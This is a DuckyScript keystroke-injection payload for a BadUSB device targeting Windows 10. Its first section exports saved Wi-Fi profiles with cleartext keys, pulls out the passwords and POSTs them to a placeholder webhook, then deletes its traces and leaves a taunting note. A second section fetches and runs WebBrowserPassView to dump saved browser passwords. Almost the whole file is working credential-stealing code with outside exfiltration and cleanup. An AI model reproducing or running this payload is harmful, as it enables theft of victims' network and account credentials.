REM Polish made the WIFI part I got the passwords part from REM Big Credit to UberGuidoZ REM Target Win 10 REM Sending WIFI Passwords through a webhook REM Replace <your_webhook_here> with your webhook like GUI r DELAY 500 STRING CMD ENTER DELAY 500 STRING cd %temp% ENTER DELAY 300 STRING netsh wlan export profile key=clear ENTER DELAY 500 STRING powershell Select-String -Path Wi*.xml -Pattern 'keyMaterial' > Wi-Fi-PASS ENTER DELAY 500 STRING powershell Invoke-WebRequest -Uri <your_webhook_here> -Method POST -InFile Wi-Fi-PASS ENTER DELAY 1000 STRING del Wi-* /s /f /q ENTER DELAY 500 STRING exit ENTER DELAY 1000 GUI r ENTER DELAY 500 STRING notepad ENTER DELAY 500 STRING I'm Sorry my Kind Sir, I did steal your wifi Passwords. GUI r DELAY 1000 STRING powershell ENTER DELAY 1000 STRING mkdir \temp ; cd \temp ; Invoke-WebRequest -Headers @{'Referer' = ''} -Uri -OutFile ; Invoke-WebRequest -Uri -OutFile ; Expand-Archive ; .\7z\7za.exe e ENTER DELAY 5000 STRING wbpv28821@ ENTER STRING .\WebBrowserPassView.exe ENTER DELAY 3000 CTRL A CTRL S DELAY 1000 STRING export.html TAB STRING h ENTER DELAY 1000 ALT F4 DELAY 1000 STRING Start-Process msedge.exe 'file:///C:/temp/export.htm --inprivate' ENTER DELAY 2000 ALT TAB DELAY 1000 STRING cd \ ENTER STRING rmdir -R \temp ENTER STRING EXIT ENTER